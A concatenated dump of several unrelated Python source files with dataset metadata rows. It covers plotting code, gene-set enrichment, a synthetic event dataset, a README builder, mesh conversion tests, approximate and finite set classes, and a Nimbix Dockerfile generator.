sus/=avgs
plt.plot(sus,label='SUS N='+str(N))
rou = np.zeros(300)
for a in range(avgs):
print('rou',a,N)
rou += get_err(False, pop_size=N)
rou/=avgs
plt.plot(rou,label='Roulette N='+str(N))
plt.legend()
plt.xlabel('t')
plt.ylabel('$\\frac{{\\sqrt{{x^2_{{err}}+y^2_{{err}}}}}}{{v}}$')
# plt.title('Wpływ metody próbkowania na jakość estymacji.')
plt.show()
# plt.figure()
# plt.plot(get_err(pop_size=10),label='N=10')
# # ----------------------
# L = 1000
# # L = 10
# a100 = np.zeros(L)
# T = 100
# # T = 10
# for t in range(T):
# print(t)
# tmp = get_err(pop_size=100,limit=L,random_walker=False)
# a100 += tmp
# a100/=T
# plt.plot(a100,label='N=100')
# a300 = np.zeros(L)
# # T = 10
# for t in range(T):
# print(t)
# tmp = get_err(pop_size=300,limit=L,random_walker=False)
# a300 += tmp
# a300/=T
# plt.plot(a300,label='N=300')
# a500 = np.zeros(L)
# # T = 10
# for t in range(T):
# print(t)
# tmp = get_err(pop_size=500,limit=L,random_walker=False)
# a500 += tmp
# a500/=T
# plt.plot(a500,label='N=500')
# a1000 = np.zeros(L)
# # T = 10
# for t in range(T):
# print(t)
# tmp = get_err(pop_size=1000,limit=L)
# # plt.plot(tmp,label=str(t))
# a1000 += tmp
# a1000/=T
# plt.plot(a1000,label='N=1000')
# a10000 = np.zeros(L)
# # T = 10
# for t in range(T):
# print(t)
# tmp = get_err(pop_size=10000,limit=L)
# # plt.plot(tmp,label=str(t))
# a10000 += tmp
# a10000/=T
# plt.plot(a10000,label='N=10000')
# plt.legend()
# plt.xlabel('t')
# # plt.ylabel('$\\sqrt{{x^2_{{err}}+y^2_{{err}}}}/v$')
# plt.ylabel('$\\frac{{\\sqrt{{x^2_{{err}}+y^2_{{err}}}}}}{{v}}$')
# # plt.title('Wpływ liczby cząstek jakość estymacji.')
# plt.show()
| 21.116279 | 76 | 0.625 | 636 | 3,632 | 3.43239 | 0.190252 | 0.064132 | 0.024737 | 0.035731 | 0.321118 | 0.252405 | 0.252405 | 0.230875 | 0.207971 | 0.136967 | 0 | 0.080104 | 0.15446 | 3,632 | 171 | 77 | 21.239766 | 0.630739 | 0.447412 | 0 | 0.065574 | 0 | 0 | 0.038402 | 0.025947 | 0 | 0 | 0 | 0 | 0 | 1 | 0.016393 | false | 0 | 0.04918 | 0 | 0.081967 | 0.032787 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e879aa27a436b9bd2399eb97ac2c13e11d6cb76e | 3,083 | py | Python | workflow/scripts/Enrichr_enrichment_GSEApy.py | sreichl/genomic_region_enrichment | 7e8425c6962290a3201f8a250dd3888b23a93d7c | [
"MIT"
] | null | null | null | workflow/scripts/Enrichr_enrichment_GSEApy.py | sreichl/genomic_region_enrichment | 7e8425c6962290a3201f8a250dd3888b23a93d7c | [
"MIT"
] | null | null | null | workflow/scripts/Enrichr_enrichment_GSEApy.py | sreichl/genomic_region_enrichment | 7e8425c6962290a3201f8a250dd3888b23a93d7c | [
"MIT"
] | null | null | null | #!/bin/env python
import pandas as pd
import pickle
import os
import numpy as np
import gseapy as gp
# utils for manual odds ratio calculation
def overlap_converter(overlap_str, bg_n, gene_list_n):
overlap_n, gene_set_n = str(overlap_str).split('/')
return odds_ratio_calc(bg_n, gene_list_n, int(gene_set_n), int(overlap_n))
def odds_ratio_calc(bg_n, gene_list_n, gene_set_n, overlap_n):
import scipy.stats as stats
table=np.array([[gene_set_n, bg_n-gene_set_n],[overlap_n, gene_list_n-overlap_n]])
oddsratio, pvalue = stats.fisher_exact(table)
return (1/oddsratio)
# get snakemake parameters
query_genes_path = snakemake.input['query_genes']
background_genes_path = snakemake.input['background_genes']
enrichr_databases = snakemake.input['enrichr_databases']
dir_results = snakemake.output['result_GSEApy']
# testing
# query_genes_path = '/nobackup/lab_bock/projects/bmdm-stim/results/ATAC/all/enrichment_analysis/DEA/LPS_2h_up/GREAT/GREAT_genes.txt'
# background_genes_path = '/nobackup/lab_bock/projects/bmdm-stim/results/ATAC/all/enrichment_analysis/DEA/background_genes/BMDM/GREAT_background_genes.txt'
# enrichr_databases = 'resources/enrichr_databases.pkl'
# dir_results = '/nobackup/lab_bock/projects/bmdm-stim/results/ATAC/all/enrichment_analysis/DEA/LPS_2h_up/GSEApy'
if not os.path.exists(dir_results):
os.mkdir(dir_results)
# check if GREAT/Genes.tsv exists & load or handle exception
if os.path.exists(query_genes_path):
genes = open(query_genes_path, "r")
gene_list = genes.read()
gene_list = gene_list.split('\n')
genes.close()
else:
with open(os.path.join(dir_results,"no_genes_found.txt"), 'w') as f:
f.write('no genes found')
quit()
# load background genes
bg_file = open(background_genes_path, "r")
background = bg_file.read()
background = background.split('\n')
bg_file.close()
# load database .pkl file
with open(enrichr_databases, 'rb') as f:
db_dict = pickle.load(f)
# convert gene lists to upper case
gene_list=[str(x).upper() for x in list(gene_list)]
background=[str(x).upper() for x in list(background)]
# perform enrichment of every database with GSEApy (plots are generated automatically)
bg_n = len(background)
res = dict()
for db in db_dict.keys():
res = gp.enrichr(gene_list=gene_list,
gene_sets=db_dict[db],
background=background,
# organism='mouse',
outdir=os.path.join(dir_results, db),
top_term=25,
cutoff=0.05,
format='svg',
verbose=False,
)
# move on if result is empty
if res.results.shape[0]==0:
continue
# annotate used gene set
res.results['Gene_set'] = db
# odds ratio calculation
gene_list_n=len(gene_list)
res.results['Odds Ratio'] = res.results['Overlap'].apply(overlap_converter, args=(bg_n, gene_list_n))
# separate export
res.results.to_csv(os.path.join(dir_results, db, "Enrichr_{}.csv".format(db)))
| 33.51087 | 155 | 0.696075 | 453 | 3,083 | 4.503311 | 0.322296 | 0.054902 | 0.026471 | 0.02451 | 0.227451 | 0.210784 | 0.155882 | 0.137255 | 0.112745 | 0.112745 | 0 | 0.003989 | 0.186831 | 3,083 | 91 | 156 | 33.879121 | 0.809733 | 0.289653 | 0 | 0 | 0 | 0 | 0.064947 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.037037 | false | 0 | 0.111111 | 0 | 0.185185 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e879c3261bb02d64435347d4c8f1654eaa42a5d9 | 3,031 | py | Python | example_data_loader.py | uoguelph-mlrg/LDG | 203695748fb6d12cef40a801e634fbdab5e23692 | [
"ECL-2.0"
] | 80 | 2019-09-24T01:56:58.000Z | 2022-03-10T07:20:52.000Z | example_data_loader.py | uoguelph-mlrg/LDG | 203695748fb6d12cef40a801e634fbdab5e23692 | [
"ECL-2.0"
] | 9 | 2019-11-14T12:33:21.000Z | 2022-03-14T08:05:54.000Z | example_data_loader.py | uoguelph-mlrg/LDG | 203695748fb6d12cef40a801e634fbdab5e23692 | [
"ECL-2.0"
] | 25 | 2019-09-26T02:14:22.000Z | 2022-03-09T12:22:03.000Z | import numpy as np
import datetime
from datetime import datetime, timezone
from data_loader import EventsDataset
class ExampleDataset(EventsDataset):
def __init__(self, split, data_dir=None):
super(ExampleDataset, self).__init__()
if split == 'train':
time_start = 0
time_end = datetime(2013, 8, 31, tzinfo=self.TZ).toordinal()
elif split == 'test':
time_start = datetime(2013, 9, 1, tzinfo=self.TZ).toordinal()
time_end = datetime(2014, 1, 1, tzinfo=self.TZ).toordinal()
else:
raise ValueError('invalid split', split)
self.FIRST_DATE = datetime(2012, 12, 28, tzinfo=self.TZ)
self.TEST_TIMESLOTS = [datetime(2013, 9, 1, tzinfo=self.TZ),
datetime(2013, 9, 25, tzinfo=self.TZ),
datetime(2013, 10, 20, tzinfo=self.TZ),
datetime(2013, 11, 15, tzinfo=self.TZ),
datetime(2013, 12, 10, tzinfo=self.TZ),
datetime(2014, 1, 1, tzinfo=self.TZ)]
self.N_nodes = 100
self.A_initial = np.random.randint(0, 2, size=(self.N_nodes, self.N_nodes))
self.A_last = np.random.randint(0, 2, size=(self.N_nodes, self.N_nodes))
print('\nA_initial', np.sum(self.A_initial))
print('A_last', np.sum(self.A_last), '\n')
self.n_events = 10000
all_events = []
for i in range(self.n_events):
user_id1 = np.random.randint(0, self.N_nodes)
user_id2 = np.random.choice(np.delete(np.arange(self.N_nodes), user_id1))
ts = max((time_start, self.FIRST_DATE.toordinal()))
event_time = datetime.fromordinal(ts + np.random.randint(0, time_end - ts) )
assert event_time.timestamp() >= self.FIRST_DATE.timestamp(), (event_time, self.FIRST_DATE)
all_events.append((user_id1, user_id2, np.random.choice(['communication event',
'association event']), event_time))
self.event_types = ['communication event']
self.all_events = sorted(all_events, key=lambda t: t[3].timestamp())
print('\n%s' % split.upper())
print('%d events between %d users loaded' % (len(self.all_events), self.N_nodes))
print('%d communication events' % (len([t for t in self.all_events if t[2] == 1])))
print('%d assocition events' % (len([t for t in self.all_events if t[2] == 0])))
self.event_types_num = {'association event': 0}
k = 1 # k >= 1 for communication events
for t in self.event_types:
self.event_types_num[t] = k
k += 1
self.n_events = len(self.all_events)
def get_Adjacency(self, multirelations=False):
if multirelations:
print('warning: this dataset has only one relation type, so multirelations are ignored')
return self.A_initial, ['association event'], self.A_last
| 42.690141 | 104 | 0.584626 | 399 | 3,031 | 4.280702 | 0.295739 | 0.032201 | 0.070258 | 0.058548 | 0.23185 | 0.147541 | 0.147541 | 0.086651 | 0.086651 | 0.086651 | 0 | 0.045961 | 0.289343 | 3,031 | 70 | 105 | 43.3 | 0.746982 | 0.010228 | 0 | 0 | 0 | 0 | 0.096398 | 0 | 0 | 0 | 0 | 0 | 0.018868 | 1 | 0.037736 | false | 0 | 0.075472 | 0 | 0.150943 | 0.132075 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e87b0aaeaa60765fcae367e6a4d8af12852ba6ec | 2,303 | py | Python | examples/build_readme.py | timdavis3991/do-py | 921d3b3bdeb108f3e6379dcacab6ed6ffaaa0776 | [
"MIT"
] | 7 | 2020-07-07T02:53:44.000Z | 2022-03-28T00:56:36.000Z | examples/build_readme.py | timdavis3991/do-py | 921d3b3bdeb108f3e6379dcacab6ed6ffaaa0776 | [
"MIT"
] | 31 | 2020-03-24T17:55:05.000Z | 2022-03-31T04:27:14.000Z | examples/build_readme.py | timdavis3991/do-py | 921d3b3bdeb108f3e6379dcacab6ed6ffaaa0776 | [
"MIT"
] | null | null | null | """
Build the do-py readme dynamically using the examples specified in the template file.
"""
import os
from do_py import DataObject, R
ROOT = os.path.abspath(__file__).replace('/examples/build_readme.py', '')
DOCSTRING_DELIM = '"""\n'
EXAMPLE_PREFIX = '//example='
class ExampleFile(DataObject):
_restrictions = {
'file_name': R.STR,
'lines': R.LIST
}
@classmethod
def from_file_name(cls, file_name):
"""
:rtype: ExampleFile
"""
lines = []
with open('{root}/examples/{file_name}'.format(root=ROOT, file_name=file_name)) as f:
lines.extend(f.readlines())
return cls({
'file_name': file_name,
'lines': lines
})
@property
def doc(self):
"""
:rtype: list of str
"""
doc_lines = []
if self.lines[0] == DOCSTRING_DELIM:
for line in self.lines[1:]:
if line == DOCSTRING_DELIM:
break
if len(doc_lines) == 0:
line = '### %s' % line
doc_lines.append(line)
return doc_lines
@property
def body(self):
"""
:rtype: list of str
"""
doc = 0
body = []
for line in self.lines:
if line == DOCSTRING_DELIM:
doc += 1
continue
if doc == 2:
body.append(line)
return body
def main():
with open('%s/examples/template_readme.md' % ROOT, 'r') as template_file:
template_readme = template_file.readlines()
readme = []
for line in template_readme:
if line.startswith(EXAMPLE_PREFIX):
example_file_name = line.replace(EXAMPLE_PREFIX, '').replace('\n', '')
example_file = ExampleFile.from_file_name(example_file_name)
readme.extend(example_file.doc)
readme.append('```python\n')
readme.extend(example_file.body)
readme.append('```\n')
readme.append('\n')
readme.append('\n')
else:
readme.append(line)
with open('%s/README.md' % ROOT, 'w+') as result_readme_file:
result_readme_file.writelines(readme)
if __name__ == '__main__':
main()
| 26.170455 | 93 | 0.532783 | 255 | 2,303 | 4.603922 | 0.270588 | 0.074957 | 0.022998 | 0.027257 | 0.099659 | 0.068995 | 0 | 0 | 0 | 0 | 0 | 0.003955 | 0.341294 | 2,303 | 87 | 94 | 26.471264 | 0.769941 | 0.062961 | 0 | 0.098361 | 0 | 0 | 0.084575 | 0.039404 | 0 | 0 | 0 | 0 | 0 | 1 | 0.065574 | false | 0 | 0.032787 | 0 | 0.180328 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e87b3748da4ce10b5009ce4ede0faab7da426d10 | 1,579 | py | Python | tests/conversions/test_pointcloudconversions.py | Bob-Yeah/kaolin | 7ad34f8158000499a30b8dfa14fb3ed86d2e57a6 | [
"ECL-2.0",
"Apache-2.0"
] | 2 | 2021-10-31T01:08:17.000Z | 2021-11-08T09:43:17.000Z | tests/conversions/test_pointcloudconversions.py | Bob-Yeah/kaolin | 7ad34f8158000499a30b8dfa14fb3ed86d2e57a6 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | tests/conversions/test_pointcloudconversions.py | Bob-Yeah/kaolin | 7ad34f8158000499a30b8dfa14fb3ed86d2e57a6 | [
"ECL-2.0",
"Apache-2.0"
] | 2 | 2021-08-10T09:19:19.000Z | 2021-11-12T08:18:17.000Z | # Copyright (c) 2019, NVIDIA CORPORATION. All rights reserved.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pytest
import torch
import sys
import kaolin as kal
from kaolin.rep import TriangleMesh
def test_pointcloud_to_voxelgrid(device='cpu'):
mesh = TriangleMesh.from_obj('tests/model.obj')
if device == 'cuda':
mesh.cuda()
pts, _ = kal.conversions.trianglemesh_to_pointcloud(mesh, 1000)
voxels = kal.conversions.pointcloud_to_voxelgrid(pts, 32, 0.1)
assert(voxels.shape == (32, 32, 32))
def test_pointcloud_to_trianglemesh(device='cpu'):
mesh = TriangleMesh.from_obj('tests/model.obj')
if device == 'cuda':
mesh.cuda()
pts, _ = kal.conversions.trianglemesh_to_pointcloud(mesh, 1000)
mesh_ = kal.conversions.pointcloud_to_trianglemesh(pts)
def test_pointcloud_to_sdf(device='cpu'):
mesh = TriangleMesh.from_obj('tests/model.obj')
if device == 'cuda':
mesh.cuda()
pts, _ = kal.conversions.trianglemesh_to_pointcloud(mesh, 1000)
sdf_ = kal.conversions.pointcloud_to_trianglemesh(pts)
| 32.895833 | 74 | 0.732109 | 220 | 1,579 | 5.122727 | 0.440909 | 0.053239 | 0.045253 | 0.050577 | 0.37622 | 0.37622 | 0.303461 | 0.303461 | 0.303461 | 0.303461 | 0 | 0.022901 | 0.170361 | 1,579 | 47 | 75 | 33.595745 | 0.837405 | 0.368588 | 0 | 0.5 | 0 | 0 | 0.066937 | 0 | 0 | 0 | 0 | 0 | 0.041667 | 1 | 0.125 | false | 0 | 0.208333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e87cc4937f8777828b512523a7e8d07bc28ebe5f | 10,022 | py | Python | sets.py | CyanoKobalamyne/pmsim | 6434a35fe0bc3aa2ce0852a942111e9d39f1959a | [
"MIT"
] | null | null | null | sets.py | CyanoKobalamyne/pmsim | 6434a35fe0bc3aa2ce0852a942111e9d39f1959a | [
"MIT"
] | null | null | null | sets.py | CyanoKobalamyne/pmsim | 6434a35fe0bc3aa2ce0852a942111e9d39f1959a | [
"MIT"
] | null | null | null | """Set implementations for Puppetmaster."""
from __future__ import annotations
from typing import (
AbstractSet,
Callable,
Iterable,
Iterator,
List,
MutableMapping,
Optional,
)
from api import ObjSet, ObjSetMaker, ObjSetMakerFactory
def default_hash(i: int, x: int, n: int):
"""Return a hash value for x.
Arguments:
i: hash function index within family
x: value to be hashed
n: domain
"""
return (x + i) % n
class IdealObjSet(set, ObjSet): # type: ignore
"""Wrapper around the built-in set."""
class IdealObjSetMaker(ObjSetMaker):
"""Wrapper around the built-in set class."""
def __call__(self, objects: Iterable[int] = ()) -> IdealObjSet:
"""Return new built-in set."""
return IdealObjSet(objects)
def free_objects(self, objects: Iterable[int]) -> None:
"""See ObjSetMaker.free_objects."""
pass
class IdealObjSetMakerFactory(ObjSetMakerFactory):
"""Factory for (wrapped) built-in sets."""
def __call__(self):
"""See ObjSetMakerFactory.__call__."""
return IdealObjSetMaker()
def __str__(self) -> str:
"""Return human-readable name for the sets."""
return "Idealized set"
class ApproximateObjSet(ObjSet):
"""Bloom filter-like implementation of an integer set."""
def __init__(self, objects: Iterable[int] = (), /, *, size: int):
"""Initialize set to contain objects."""
self.bits = 0
self.size = size
for obj in objects:
self.bits |= 1 << (obj % size)
def __contains__(self, obj: object) -> bool:
"""Not implemented."""
raise NotImplementedError
def __iter__(self) -> Iterator[int]:
"""Not implemented."""
raise NotImplementedError
def __len__(self) -> int:
"""Not implemented."""
raise NotImplementedError
def __bool__(self) -> bool:
"""Return False if set is empty."""
return self.bits != 0
def __or__(self, other: AbstractSet) -> ApproximateObjSet:
"""Return the union of this set and the other set."""
if isinstance(other, ApproximateObjSet):
out = ApproximateObjSet(size=self.size)
out.bits = self.bits | other.bits
return out
else:
raise TypeError(
f"other set must have type {self.__class__.__name__}, not {type(other)}"
)
def __and__(self, other: AbstractSet) -> ApproximateObjSet:
"""Return the intersection of this set and the other set."""
if isinstance(other, ApproximateObjSet):
out = ApproximateObjSet(size=self.size)
out.bits = self.bits & other.bits
return out
else:
raise TypeError(
f"other set must have type {self.__class__.__name__}, not {type(other)}"
)
def copy(self):
"""See ObjSet.copy."""
copied = ApproximateObjSet(size=self.size)
copied.bits = self.bits
return copied
class ApproximateObjSetMaker(ObjSetMaker):
"""Makes approximate object set instances."""
def __init__(self, factory: ApproximateObjSetMakerFactory):
"""Initialize approximate object set maker."""
self.size = factory.size
def __call__(self, objects: Iterable[int] = ()) -> ApproximateObjSet:
"""Return new approximate set."""
return ApproximateObjSet(objects, size=self.size)
def free_objects(self, objects: Iterable[int]) -> None:
"""See ObjSetMaker.free_objects."""
pass
class ApproximateObjSetMakerFactory(ObjSetMakerFactory):
"""Factory for approximate set maker instances with preset arguments."""
def __init__(self, size: int):
"""Initialize factory for approximate object set makers.
Arguments:
size: width of bit vector used to represent the set
"""
self.size = size
self.generator = ApproximateObjSetMaker(self)
def __call__(self) -> ApproximateObjSetMaker:
"""Return new approximate object set maker."""
return self.generator
def __str__(self) -> str:
"""Return human-readable name for the sets."""
return f"Approximate set ({self.size} bits)"
class FiniteObjSet(ObjSet):
"""Fixed-size set with a global renaming table."""
def __init__(
self,
objects: Iterable[int] = (),
/,
*,
size: int,
renaming_table: MutableMapping[int, int],
):
"""Initialize set to contain objects."""
self.bits = 0
self.objs = [-1] * size
self.size = size
self.table = renaming_table
inserted = set()
for obj in objects:
if obj in inserted:
# Ignore duplicates.
continue
try:
index = renaming_table[obj]
inserted.add(obj)
except KeyError:
for iobj in inserted:
del renaming_table[iobj]
raise ValueError("renaming table can't accept this object")
self.bits |= 1 << index
self.objs[index] = obj
def __contains__(self, obj: object) -> bool:
"""Not implemented."""
raise NotImplementedError
def __iter__(self) -> Iterator[int]:
"""Yield each object in the set."""
for obj in self.objs:
if obj != -1:
yield obj
def __len__(self) -> int:
"""Not implemented."""
raise NotImplementedError
def __bool__(self) -> bool:
"""Return False if set is empty."""
return self.bits != 0
def __or__(self, other: AbstractSet) -> FiniteObjSet:
"""Return the union of this set and the other set."""
if isinstance(other, FiniteObjSet):
out = FiniteObjSet(size=self.size, renaming_table=self.table)
out.bits = self.bits | other.bits
return out
else:
raise TypeError(
f"other set must have type {self.__class__.__name__}, not {type(other)}"
)
def __and__(self, other: AbstractSet) -> FiniteObjSet:
"""Return the intersection of this set and the other set."""
if isinstance(other, FiniteObjSet):
out = FiniteObjSet(size=self.size, renaming_table=self.table)
out.bits = self.bits & other.bits
return out
else:
raise TypeError(
f"other set must have type {self.__class__.__name__}, not {type(other)}"
)
def copy(self):
"""See ObjSet.copy."""
copied = FiniteObjSet(size=self.size, renaming_table=self.table)
copied.bits = self.bits
copied.objs = self.objs
return copied
class FiniteObjSetMaker(ObjSetMaker, MutableMapping[int, int]):
"""Makes fixed-size object sets that use a global renaming table."""
def __init__(self, factory: FiniteObjSetMakerFactory):
"""Initialize finite set maker."""
self.size = factory.size
self.hash_fn = factory.hash_fn
self.n_hash_funcs = factory.n_hash_funcs
self.table = [(-1, 0)] * factory.size
self.history: List[int] = []
def __call__(self, objects: Iterable[int] = ()) -> FiniteObjSet:
"""Return new fixed-size set."""
return FiniteObjSet(objects, size=self.size, renaming_table=self)
def free_objects(self, objects: Iterable[int]) -> None:
"""Free resources associated with objects in the set."""
for obj in objects:
del self[obj]
def __getitem__(self, obj: int) -> int:
"""Return name for object smaller than the table size."""
assert obj != -1
for i in range(self.n_hash_funcs):
h = self.hash_fn(i, obj, self.size)
prev_obj, count = self.table[h]
if prev_obj == -1:
self.table[h] = (obj, 1)
elif prev_obj == obj:
self.table[h] = (obj, count + 1)
else:
continue
self.history.append(i + 1)
return h
raise KeyError("renaming table is full")
def __delitem__(self, obj: int) -> None:
"""Remove an object from the renaming table."""
assert obj != -1
for i in range(self.n_hash_funcs):
h = self.hash_fn(i, obj, self.size)
prev_obj, count = self.table[h]
assert prev_obj != -1 and count > 0 or prev_obj == -1 and count == 0
if prev_obj == obj and count == 1:
self.table[h] = (-1, 0)
elif prev_obj == obj and count > 1:
self.table[h] = (obj, count - 1)
else:
continue
break
else:
raise KeyError("object not found")
def __setitem__(self, obj: int, name: int) -> None:
"""Not implemented."""
raise NotImplementedError
def __iter__(self):
"""Not implemented."""
raise NotImplementedError
def __len__(self):
"""Not implemented."""
raise NotImplementedError
class FiniteObjSetMakerFactory(ObjSetMakerFactory):
"""Factory for fixed-size object set makers with preset arguments."""
def __init__(
self,
size: int,
hash_fn: Optional[Callable[[int, int, int], int]] = None,
n_hash_funcs: Optional[int] = None,
):
"""Initialize factory with set size and hash functions."""
self.size = size
self.hash_fn = default_hash if hash_fn is None else hash_fn
self.n_hash_funcs = size if n_hash_funcs is None else n_hash_funcs
def __call__(self, objects: Iterable[int] = ()) -> FiniteObjSetMaker:
"""Return new fixed-size set maker."""
return FiniteObjSetMaker(self)
def __str__(self) -> str:
"""Return human-readable name for the sets."""
return f"Fixed-size set ({self.size} bits, {self.n_hash_funcs} hash functions)"
| 31.815873 | 88 | 0.587108 | 1,126 | 10,022 | 5.03286 | 0.153641 | 0.028234 | 0.030175 | 0.034939 | 0.530969 | 0.50997 | 0.445915 | 0.402153 | 0.352568 | 0.342333 | 0 | 0.003576 | 0.302435 | 10,022 | 314 | 89 | 31.917197 | 0.807038 | 0.192177 | 0 | 0.476923 | 0 | 0 | 0.060067 | 0.01332 | 0 | 0 | 0 | 0 | 0.015385 | 1 | 0.194872 | false | 0.010256 | 0.015385 | 0 | 0.353846 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e87cce78dea332042a68f4be41eba0d8f1e51b57 | 7,079 | py | Python | nimbix.py | bttu/Containerization | 0e4b5f48f0c43e83a5667f36069f2d94aa845e38 | [
"Apache-2.0"
] | 1 | 2021-09-01T15:43:07.000Z | 2021-09-01T15:43:07.000Z | nimbix.py | bttu/Containerization | 0e4b5f48f0c43e83a5667f36069f2d94aa845e38 | [
"Apache-2.0"
] | null | null | null | nimbix.py | bttu/Containerization | 0e4b5f48f0c43e83a5667f36069f2d94aa845e38 | [
"Apache-2.0"
] | 5 | 2020-06-14T10:15:24.000Z | 2021-11-25T10:51:58.000Z | #!/usr/bin/env python
import json
import subprocess
import os
import sys
import datetime
import shutil, errno
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('-path', help = 'the config file path, default as config.json')
args = parser.parse_args()
def copyanything(src, dst):
try:
shutil.copytree(src, dst)
except OSError as exc: # python >2.5
if exc.errno == errno.ENOTDIR:
shutil.copy(src, dst)
else: raise
def list_tags() :
sys.exit("XRT and platform do NOT match! \
Available platform and XRT combination:\
\
Platform XRT Version OS Version\
alveo-u200 2018.3 /2019.1 / 2019.2 / 2020.1 Ubuntu 16.04 / Ubuntu 18.04 / CentOS\
alveo-u250 2018.3 /2019.1 / 2019.2 / 2020.1 Ubuntu 16.04 / Ubuntu 18.04 / CentOS\
alveo-u280 2019.2 / 2020.1 Ubuntu 16.04 / Ubuntu 18.04 / CentOS\
alveo-u50 2019.2 / 2020.1 Ubuntu 16.04 / Ubuntu 18.04 / CentOS")
if args.path:
with open(args.path) as d:
repos = json.load(d)
else:
with open('config.json') as d:
repos = json.load(d)
vendor = repos['vendor']
metadata = repos['metadata']
provisioners = repos['provisioners']
app_info = repos['app_info']
post_processors = repos['post_processors']
example_path = "examples/nimbix/"
if vendor != "nimbix":
sys.exit("Vendor is NOT supported! ")
with open(example_path+'AppDef.json.example') as d:
appdef = json.load(d)
if not metadata['app_name']:
sys.exit("Application name can NOT be empty!")
if not app_info['os_version']:
sys.exit("OS version can NOT be empty!")
if not app_info['xrt_version']:
sys.exit("XRT version can NOT be empty!")
if not app_info['platform']:
sys.exit("Platform can NOT be empty!")
if not post_processors['repository']:
sys.exit("Repository can NOT be empty!")
if not post_processors['tag']:
sys.exit("Tag can NOT be empty!")
internal = False
if "internal" in metadata and metadata['internal']:
internal = True
with open('spec.json') as d:
spec = json.load(d)
commands = []
labels = {}
# Xilinx Base Runtim Image Url
image_url = ""
target_platforms = []
if internal:
image_url = "xdock.xilinx.com/base_runtime:" + post_processors['tag'] + "-" + app_info['os_version']
else:
if app_info['os_version'] in spec['os_version']:
if app_info['xrt_version'] in spec['os_version'][app_info['os_version']]['xrt_version']:
image_url = "xilinx/xilinx_runtime_base:" + "alveo" + "-" + app_info['xrt_version'] + "-" + app_info['os_version']
for platform in app_info['platform']:
if platform in spec['os_version'][app_info['os_version']]['xrt_version'][app_info['xrt_version']]['platform']:
target_platforms.append(spec['os_version'][app_info['os_version']]['xrt_version'][app_info['xrt_version']]['platform'][platform])
if platform == "alveo-u50" and app_info['xrt_version'] == "2019.2":
image_url += "-u50"
commands.append("ENV INTERNAL_BUILD=1")
else:
print(" [Warning] Invalide platform: " + platform)
if not image_url:
list_tags()
dockerfile_example = example_path + ("Dockerfile_Centos.example" if app_info['os_version'] == "centos" else "Dockerfile_Ubuntu.example")
timestamp = datetime.datetime.now().strftime("%Y%m%d%H%M%S")
path = "build_history/" + timestamp
try:
os.mkdir(path)
shutil.copy(example_path+'help.html.example', path + "/help.html")
shutil.copy(example_path+'xilinx_runtime.sh.example', path + "/xilinx_runtime.sh")
except OSError:
sys.exit("[Error]: Can NOT create folder " + path)
for pro in provisioners:
ctype = pro['type']
if ctype == 'shell':
commands.append("RUN " + " && ".join(pro['inline']))
elif ctype == 'file':
if not os.path.exists(pro['source']):
sys.exit(pro['source'] + " does NOT exists!")
filename = os.path.basename(os.path.normpath(pro['destination']))
copyanything(pro['source'], path + "/" + filename)
commands.append("COPY " + filename + " " + pro['destination'])
elif ctype == 'label':
labels[pro['key']] = pro['value']
else:
print("Warning: Unknown type: " + ctype + "! ")
if "app_cover_image" in metadata:
app_cover_image = metadata["app_cover_image"]
if not os.path.exists(app_cover_image):
print("[Warning]: " + app_cover_image + " is not exists! ")
elif not app_cover_image.lower().endswith('.png'):
print("[Warning]: Cover image must be PNG image! Skip adding cover image! ")
else:
copyanything(app_cover_image, path + "/" + "screenshot.png")
commands.append("COPY screenshot.png /etc/NAE/screenshot.png")
commands.append("RUN chmod 644 /etc/NAE/screenshot.png")
if "app_license" in metadata:
app_license = metadata["app_license"]
if not os.path.exists(app_license):
print("[Warning]: " + app_license + " is not exists! ")
elif not app_license.lower().endswith('.txt'):
print("[Warning]: License file must be txt file! Skip adding license file! ")
else:
copyanything(app_license, path + "/" + "license.txt")
commands.append("COPY license.txt /etc/NAE/license.txt")
with open(dockerfile_example, "r") as f:
s = f.read()
s = s.replace("__from_image__", image_url)
with open(path + "/Dockerfile", "w") as d:
d.write(s)
for command in commands:
d.write(command + "\n")
